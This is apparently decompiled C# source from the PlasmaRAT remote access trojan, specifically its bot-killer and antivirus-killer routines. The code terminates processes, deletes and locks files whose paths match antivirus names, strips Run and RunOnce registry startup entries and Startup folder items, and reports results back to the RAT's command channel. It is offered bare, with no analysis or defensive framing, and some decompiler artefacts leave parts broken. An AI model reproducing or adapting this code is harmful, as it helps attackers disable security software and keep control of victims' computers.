// Token: 0x0600004E RID: 78 RVA: 0x00005508 File Offset: 0x00003708
public static bool CheckProcess(string location)
{
bool result;
try
{
string[] array = Strings.Split(AVKill.SearchStrings, " ", -1, CompareMethod.Binary);
string text = Strings.StrConv(location.ToString(), VbStrConv.Lowercase, 0);
foreach (string value in array)
{
try
{
if (text.Contains(value))
{
AVKill.FuckFileName(location.ToString());
BotKillers.KillFile(location.ToString());
result = true;
break;
}
}
catch (Exception ex)
{
}
}
}
catch (Exception ex2)
{
}
return(result);
}
// Token: 0x06000054 RID: 84 RVA: 0x000058A8 File Offset: 0x00003AA8
public static void ScanProcess()
{
try
{
Process[] processes = Process.GetProcesses();
int num = 0;
int num2 = processes.Length - 1;
for (int i = num; i <= num2; i++)
{
Process process = processes[i];
try
{
string fullPath = Path.GetFullPath(process.MainModule.FileName);
if (BotKillers.IsFileMalicious(fullPath) && !BotKillers.WindowIsVisible(process.MainWindowTitle))
{
try
{
process.Kill();
}
catch (Exception ex)
{
}
BotKillers.DestroyFile(fullPath);
BotKillers.ProccessKilled++;
}
}
catch (Exception ex2)
{
}
}
}
catch (Exception ex3)
{
}
}
public static void DestroyFile(string path)
{
try
{
if (File.Exists(path))
{
Random random = new Random();
try
{
MyProject.Computer.FileSystem.MoveFile(path, Path.GetTempPath() + Conversions.ToString(random.Next(500, 9000)));
File.WriteAllText(path, string.Empty);
FileSystem.FileOpen(FileSystem.FreeFile(), path, OpenMode.Input, OpenAccess.Default, OpenShare.LockReadWrite, -1);
BotKillers.KillFile(path);
}
catch (Exception ex)
{
DirectoryInfo directoryInfo = new DirectoryInfo(path);
DirectorySecurity directorySecurity = new DirectorySecurity();
directorySecurity.SetAccessRuleProtection(true, false);
directoryInfo.SetAccessControl(directorySecurity);
}
}
}
catch (Exception ex2)
{
}
}
// Token: 0x06000059 RID: 89 RVA: 0x00005D74 File Offset: 0x00003F74
public static void StartupFucker(string regkey, int type)
{
try
{
RegistryKey registryKey;
if (type == 1)
{
registryKey = Registry.CurrentUser.OpenSubKey(regkey);
}
if (type == 2)
{
registryKey = Registry.LocalMachine.OpenSubKey(regkey);
}
foreach (string text in registryKey.GetValueNames())
{
try
{
string text2 = registryKey.GetValue(text).ToString();
if (text2.Contains("-"))
{
if (text2.Contains("\""))
{
text2.Replace("\"", string.Empty);
}
try
{
string[] array = Strings.Split(text2, " -", -1, CompareMethod.Binary);
text2 = array[0];
}
catch (Exception ex)
{
}
}
if (text2.Contains("\""))
{
string[] array2 = text2.Split(new char[]
{
'"'
});
text2 = array2[1];
}
if (!text2.Contains(Application.ExecutablePath))
{
BotKillers.RemoveKey(type, text, regkey, text2);
if (!BotKillers.WinTrust.VerifyEmbeddedSignature(text2))
{
BotKillers.Startupkilled++;
BotKillers.DestroyFile(text2);
}
}
}
catch (Exception ex2)
{
}
}
}
catch (Exception ex3)
{
}
}
// Token: 0x06000057 RID: 87 RVA: 0x00005C08 File Offset: 0x00003E08
public static bool WindowIsVisible(string WinTitle)
{
bool result;
try
{
IntPtr hWnd = BotKillers.FindWindow(null, WinTitle);
result = BotKillers.IsWindowVisible(hWnd);
}
catch (Exception ex)
{
result = false;
}
return(result);
}
// Token: 0x06000047 RID: 71 RVA: 0x00004E74 File Offset: 0x00003074
public static void searchav(string folder)
{
try
{
string[] array = Strings.Split(AVKill.SearchStrings, " ", -1, CompareMethod.Binary);
string[] directories = Directory.GetDirectories(folder);
foreach (string text in directories)
{
try
{
if (Operators.CompareString(AVKill.searchedfolders, text.ToString(), false) != 0)
{
AVKill.searchedfolders = text.ToString();
text.ToString();
string text2 = Strings.StrConv(text.ToString(), VbStrConv.Lowercase, 0);
foreach (string value in array)
{
try
{
if (text2.Contains(value))
{
BotKillers.KillFile(text.ToString());
}
}
catch (Exception ex)
{
}
}
}
}
catch (Exception ex2)
{
}
}
}
catch (Exception ex3)
{
}
}
// Token: 0x06000048 RID: 72 RVA: 0x00004F7C File Offset: 0x0000317C
public static void CheckFileforAV(string path)
{
try
{
string[] array = Strings.Split(AVKill.SearchStrings, " ", -1, CompareMethod.Binary);
string text = Strings.StrConv(path.ToString(), VbStrConv.Lowercase, 0);
foreach (string value in array)
{
try
{
if (text.Contains(value))
{
BotKillers.KillFile(path.ToString());
}
}
catch (Exception ex)
{
}
}
}
catch (Exception ex2)
{
}
}
// Token: 0x0600005C RID: 92 RVA: 0x0000602C File Offset: 0x0000422C
public static object HardBotKill()
{
int num;
int num4;
object obj;
try
{
IL_00:
ProjectData.ClearProjectError();
num = 1;
IL_07:
int num2 = 2;
if (AntiEverything.AntisDetected)
{
goto IL_AB;
}
IL_13:
num2 = 3;
BotKillers.RunStartupKiller();
IL_1A:
num2 = 4;
HardBK.KillKeys(Registry.CurrentUser.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\Run", true));
IL_32:
num2 = 5;
HardBK.KillKeys(Registry.CurrentUser.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true));
IL_4A:
num2 = 6;
BotKillers.KillFile(Environment.GetFolderPath(Environment.SpecialFolder.Startup));
IL_57:
num2 = 7;
if (!AntiEverything.IsAdmin())
{
goto IL_91;
}
IL_60:
num2 = 8;
HardBK.KillKeys(Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\Run", true));
IL_78:
num2 = 9;
HardBK.KillKeys(Registry.LocalMachine.OpenSubKey("software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", true));
IL_91:
num2 = 11;
BotKillers.ScanProcess();
IL_99:
num2 = 12;
PlasmaRAT.TalktoChannel("BK: Hard Bot Killer Ran Successfully!", string.Empty);
IL_AB:
goto IL_135;
IL_B0:
int num3 = num4 + 1;
num4 = 0;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
IL_F6:
goto IL_12A;
IL_F8:
num4 = num2;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
IL_108 :;
}
catch when(endfilter(obj is Exception & num != 0 & num4 == 0))
{
Exception ex = (Exception)obj2;
goto IL_F8;
}
IL_12A:
throw ProjectData.CreateProjectError(-2146828237);
IL_135:
object obj3;
object result = obj3;
if (num4 != 0)
{
ProjectData.ClearProjectError();
}
return(result);
}
// Token: 0x06000058 RID: 88 RVA: 0x00005C48 File Offset: 0x00003E48
public static void RunStartupKiller()
{
int num;
int num4;
object obj;
try
{
IL_00:
ProjectData.ClearProjectError();
num = 1;
IL_07:
int num2 = 2;
BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 1);
IL_14:
num2 = 3;
BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\", 1);
IL_21:
num2 = 4;
if (!AntiEverything.IsAdmin())
{
goto IL_44;
}
IL_2A:
num2 = 5;
BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 2);
IL_37:
num2 = 6;
BotKillers.StartupFucker("Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\", 2);
IL_44:
num2 = 8;
string[] files = Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.Startup));
IL_52:
num2 = 9;
string[] array = files;
int i = 0;
while (i < array.Length)
{
string location = array[i];
IL_66:
num2 = 10;
BotKillers.KillFile(location);
i++;
IL_76:
num2 = 11;
}
IL_80:
goto IL_106;
IL_85:
int num3 = num4 + 1;
num4 = 0;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
IL_C5:
goto IL_FB;
IL_C7:
num4 = num2;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
IL_D8 :;
}
catch when(endfilter(obj is Exception & num != 0 & num4 == 0))
{
Exception ex = (Exception)obj2;
goto IL_C7;
}
IL_FB:
throw ProjectData.CreateProjectError(-2146828237);
IL_106:
if (num4 != 0)
{
ProjectData.ClearProjectError();
}
}
// Token: 0x06000053 RID: 83 RVA: 0x00005794 File Offset: 0x00003994
public static void RunStandardBotKiller()
{
int num;
int num4;
object obj;
try
{
IL_00:
ProjectData.ClearProjectError();
num = 1;
IL_07:
int num2 = 2;
BotKillers.ScanProcess();
IL_0E:
num2 = 3;
BotKillers.RunStartupKiller();
IL_15:
num2 = 4;
PlasmaRAT.TalktoChannel(string.Concat(new string[]
{
"BotKiller: Processes Killed: ",
BotKillers.ProccessKilled.ToString(),
". Startup Items Killed: ",
BotKillers.Startupkilled.ToString(),
"."
}), "");
IL_74:
num2 = 5;
BotKillers.ProccessKilled = 0;
IL_7C:
num2 = 6;
BotKillers.Startupkilled = 0;
IL_84:
goto IL_EF;
IL_86:
int num3 = num4 + 1;
num4 = 0;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
IL_B0:
goto IL_E4;
IL_B2:
num4 = num2;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
IL_C2 :;
}
catch when(endfilter(obj is Exception & num != 0 & num4 == 0))
{
Exception ex = (Exception)obj2;
goto IL_B2;
}
IL_E4:
throw ProjectData.CreateProjectError(-2146828237);
IL_EF:
if (num4 != 0)
{
ProjectData.ClearProjectError();
}
}